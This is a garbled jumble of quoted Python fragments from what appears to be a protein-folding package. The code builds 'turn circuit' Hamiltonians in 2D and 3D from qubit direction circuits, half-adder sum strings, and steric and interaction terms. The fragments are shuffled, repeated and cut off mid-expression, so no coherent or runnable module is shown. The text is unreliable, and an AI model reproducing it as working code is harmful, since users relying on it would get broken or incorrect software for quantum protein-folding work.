self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "2) if t > 1 else [1] for h in iterator: if self.ss_fmat", "in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return", "q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def", "+ \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)),", "direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k):", "\\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "of the \"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring)", "self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2", "sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]", "q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "+ \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i 
in range(self.naas-2)])", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap", "1 if the chain moves in the direction x-.\"\"\" return q_i * (1-q_j)", "self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts", "maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0: return", "in range(maximum)]) for k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0],", "circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit", "qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0],", "0 else 0 if (j-i) % 2 != 0 or maximum < 2:", "the chain moves in the direction y-.\"\"\" return q_i * q_j * (1-q_k)", "!=0 else 0 if maximum == 0: return 0 prefactor = qand([ qand([", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)),", "range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\", "[self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-': sum_string =", "for i in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i,", "(self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr", "\\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([", "qand([ qxor(sumstring['x+'][r-1], 
sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1])", "\\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in", "expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def pointer(self,", "in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the", "p in range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i,", "if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class", "self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr", "b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i)))", "self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does", "in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r])", "in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i,", "circuit that returns 1 if the chain moves in the direction z-.\"\"\" return", "1 if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self,", "abc import * from tqdm import tqdm, trange from copy import deepcopy from", "qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1])", "dim(self): return 2 def pointer(self, i): \"\"\"Points to the start of the string", "circuit that returns 1 if the chain moves in the direction y+.\"\"\" return", "t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) 
for", "in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i,", "self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k):", "\\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for", "the chain moves in the direction y+.\"\"\" return q_i * (1-q_j) * q_k", "True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein", "qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1])", "(self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes", "= True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points to the", "does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for residues i", "def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self,", "sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ *", "t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "if i-j != 0 else 0 if (j-i) % 2 != 0 or", "range(2, maximum+1)])) def interaction_term_ij(self, i, j): 
return -1* self.int_mat[i, j] * (self.a_x(i, j)", "== 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise", "in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go back on", "\\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r", "a circuit that returns 1 if the chain moves in the direction z-.\"\"\"", "in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "that the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr +=", "3 def pointer(self, i): \"\"\"Points to the start of the string describing the", "'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0", "string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k):", "the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j,", "> j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if", "* (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] =", "the chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j):", "\\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def", "in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): 
\"\"\"Implements the term that penalises", "range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for", "ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns", "self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "if i-j != 0 else 0 if maximum == 0: return 0 prefactor", "( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)])", "* (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the", "q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "\\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([", "TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points", "moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a", "q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "def dim(self): return 3 def pointer(self, i): \"\"\"Points to the start of the", "qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\", "r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def", "a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) *", "for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) 
for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1])", "circuit that returns 1 if the chain moves in the direction x+.\"\"\" return", "itertools import chain from functools import reduce from .qlogic import * from proteinham.core.hamiltonian", "= [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements", "was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to keep", "\\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves in", "the chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k", "maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "@property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self):", "0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "[qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "in range(maximum)]) for k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0],", "k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "to the start of the string describing the ith turn.\"\"\" return 2*i def", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), 
self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)),", "== 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else:", "t % 2 == 0: iterator = range(0, t+1, 2) if t >", "if t > 0 else [0] else: iterator = range(1, t+1, 2) if", "'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b =", "sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i > j: raise", "iterator = range(0, t+1, 2) if t > 0 else [0] else: iterator", "\\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the", "qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for", "sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 ==", "[qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in", "( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)])", "j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in", "moves in the direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self,", "q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] )", "the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i,", "\\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1,", "if the chain moves in the direction x+.\"\"\" return q_i * q_j *", "interaction_term(self): 
\"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for", "int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)]", "et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings", "'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'),", "qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\", "h in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else:", "* qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1],", "qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\", "sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'y']]) return", "\\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i,", "for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i,", "'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-')", "self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)]))", "x in range(maximum)] return 
self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that", "in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r", "[self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k))", "def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property", "j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum", "qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for", "= se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of", "qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D =", "= [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was", "prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ (", "'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-')", "residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)):", "back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j))))", "return -1 * 
self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def", "the term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)),", "else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r])", "@property def dim(self): return 3 def pointer(self, i): \"\"\"Points to the start of", "self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j", "import tqdm, trange from copy import deepcopy from itertools import chain from functools", "self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for", "a circuit that returns 1 if the chain moves in the direction y-.\"\"\"", "string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i, j, k):", "in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)),", "= range(1, t+1, 2) if t > 1 else [1] for h in", "np.zeros(n_layers) # lazy way to keep track of half-adders sum_string = list(reversed(sum_string)) for", "(i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+':", "circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go", "maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-'", "continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a", "j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def", "import Hamiltonian class 
CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the", "* qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1],", "range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for", "* qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1],", "if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i,", "self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "the direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i, q_j,", "j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j):", "of the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j):", "j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum", "if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i,", "circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring = {", "j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0", "0 if maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' %", "j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "k == 'x-': sum_string = 
[self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "for t in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for", "self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i, j,", "in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter =", "that returns 1 if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j)", "of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t %", "checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self,", "[sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the", "self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr", "0: iterator = range(0, t+1, 2) if t > 0 else [0] else:", "!= 0 else 0 if (j-i) % 2 != 0 or maximum <", "'x-'), 'y+': 
self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j))))", "moves in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self,", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-': sum_string =", "\\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in", "\\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the", "sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string))", "else 0 if maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+'", "self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] +", "in the direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i,", "'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-':", "ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self):", "@property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if", "'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-':", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term", "self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in 
